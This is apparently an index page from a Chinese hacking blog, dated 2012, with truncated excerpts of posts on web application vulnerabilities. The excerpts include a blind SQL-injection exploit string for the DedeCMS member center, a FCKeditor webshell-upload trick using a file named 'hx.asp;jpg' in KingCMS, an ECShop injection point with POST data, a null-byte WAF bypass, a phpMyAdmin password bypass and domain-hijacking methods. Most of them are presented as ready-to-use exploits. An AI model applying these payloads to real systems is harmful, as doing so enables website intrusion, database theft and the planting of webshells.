Microsoft IE mshtml!CDwnBindInfo对象释放后重用代码执行漏洞

分类:安全 | 2012-12-30 | 撸过 689 次
1人扯谈

new IE 0day coming-mshtml!CDwnBindInfo object use after free vulnerability -

一个影响IE8及以上版本的0day被国外某网站所披露,它通过挂马方式,针对CFR(Council on Foreign Relations)网站的用户进行定向攻击。

我们在@eromang及@yomuds的帮助下,并对其进行简单分析。我们发现其本质是mshtml!CDwnBindInfo对象释放后重用,引发内存崩溃,通过精心构造堆内存,攻击者可执行任意代码。

0:015> bl
0 e 3dc4ec35     0001 (0001[......]

继续阅读

DedeCMS会员中心分类管理SQL注射0day

分类:安全 | 2012-12-30 | 撸过 583 次
0人扯谈

漏洞描述:

需要magic_quotes_gpc = Off,所以说是鸡肋啊.

发生在数组key里的注射漏洞,有点意思.

这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下

http://www.webshell.cc/member/mtypes.php?dopost=save

exploit:

mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and[......]

继续阅读

kingcms 5.0 漏洞

分类:安全 | 2012-12-30 | 撸过 768 次
0人扯谈

1。kingcms 5.0 fckeditor的默认路径在

admin/system/editor/FCKeditor/editor/fckeditor.Html

把本地的马命名为 hx.asp;jpg 注意看 jpg前面没有点了..

OK了..其实以后做站结合fckeditor这类的编辑器..最好加个验证..只有管理才能访问..这样或者比较好吧

2。编辑器路径:

/admin/system/editor/

利用方式:访问

https://www.webshell.cc/admin/system/editor/FCKeditor/editor/filemanager/connectors/a[......]

继续阅读

ECShop全版本注入0day

分类:安全 | 2012-12-30 | 撸过 497 次
0人扯谈

先注册账户,随便选个商品进购物车,把任意商品加入购物车在填写配送地址那一页,有地区选择,然后填地址,电话什么的

flow.php?step=consignee&direct_shopping=1

比如省选择北京
其中POST数据如下

country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&[......]

继续阅读

安全狗iis 6.0 ; 截断解析突破

分类:安全 | 2012-12-23 | 撸过 687 次
0人扯谈

看好友日志的一篇文章,写的很好,但是还没有实践,先转来在说

众所周知web安全狗是国内比较流氓的软件,劫持模块,坑爹的删不了。除了这些流氓行为之外,还恬不知耻的做了各种没有用的限制!比如说注入安全狗本身对xx.asp?id=69 and 1=1和 xx.asp?id=69 and 1=2这些是过滤的,可是对xx.asp?90sec.org=%00.&xw_id=69%20 and 1=1和xx.asp?90sec.org=%00.&xw_id=69%20 and 1=2 却是正常,这个不在今天的讨论范围之内!不过不得不说安全狗在;截断的验证做的还是比较好的!这也是让很多朋友头[......]

继续阅读

phpmyadmin 2.11.4万能密码漏洞

分类:安全 | 2012-12-12 | 撸过 1,657 次
0人扯谈

phpmyadmin 2.11.4

phpmyadmin 2.11.3

两个版本都有此漏洞

我去测试了一下 确实可以用。。。

你们可以试一下

只需要输入账号  密码不需要输入
[......]

继续阅读

黑客进行域名劫持的几种方法总结

分类:安全 | 2012-12-12 | 撸过 1,234 次
0人扯谈

一. 介绍

 
在2012年10月24日。社会化分享网站Diigo域名被盗,导致500万用户无法使用网站。
 
域名盗窃,也叫做域名劫持,不是新技术。早在2005年,SSAC报告就指出了多起域名劫持事件。域名劫持被定义为:从域名持有者获得非法域名的控制权
 
本文介绍了域名劫持的几种技术
 
二. 域名劫持的几种方法
有几种不同的劫持方法,1假扮域名注册人和域名注册商通信.2是伪造域名注册人在注册商处的账户信息,3.是伪造域名注册人的域名转移请求。4.是直接进行一次域名转移请求。5是修改域名的DNS记录
 
1.假扮域名注册人和域名注册商通信
这类域名盗窃包括使用伪造的传真,邮件等来修改域名注[......]

继续阅读

discuz X2.5 爆物理地址路径漏洞!

分类:安全 | 2012-12-5 | 撸过 1,227 次
0人扯谈

三处:

http://www.webshell.cc/uc_server/control/admin/db.php
https://www.webshell.cc/source/plugin/myrepeats/table/table_myrepeats.php
https://www.webshell.cc/install/include/install_lang.php